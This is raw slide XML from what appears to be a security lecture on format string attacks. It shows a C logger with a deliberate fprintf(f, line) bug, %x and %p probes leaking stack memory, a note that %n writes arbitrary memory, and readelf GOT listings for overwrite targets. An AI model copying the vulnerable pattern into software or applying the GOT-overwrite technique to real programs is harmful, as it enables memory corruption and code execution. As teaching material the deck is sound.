                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1600201"/>
            <a:ext cx="4038600" cy="4177625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">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add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(FILE* f) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	char line[65536];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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0, res;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	while (1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		res = read(0, &amp;line[</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1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		if (res == 0) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		if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65536) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		if (line[</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- 1] == '\n') {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			line[</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'\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(f, line);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202195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Executions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gcc</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-m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>format_string.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -o format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"test line" | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"test line %x %x" | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>line 1 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "AAAABBBBCCCCDDDD" + "%p" * 8'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD0x1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x414141410x424242420x434343430x44444444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x702570250x702570250x70257025</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128023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String Exploitation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Using %n, we can write to any memory address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The GOT has the addresses of dynamically linked functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>relocs</a:t>
            </a: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format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Relocation section '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' at offset 0x2ec contains 1 entries: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Offset     Info    Type            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Sym.Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  Sym. Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497bc  00000106 R_386_GLOB_DAT    00000000   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gmon_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Relocation section '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' at offset 0x2f4 contains 7 entries: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Offset     Info    Type            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Sym.Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  Sym. Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497cc  00000107 R_386_JUMP_SLOT   00000000   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gmon_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d0  00000207 R_386_JUMP_SLOT   00000000   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_start_main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d4  00000307 R_386_JUMP_SLOT   00000000   read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d8  00000407 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497dc  00000507 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497e0  00000607 R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497e4  00000707 R_386_JUMP_SLOT   00000000   exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRP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31194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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>call   804839c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0804839c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
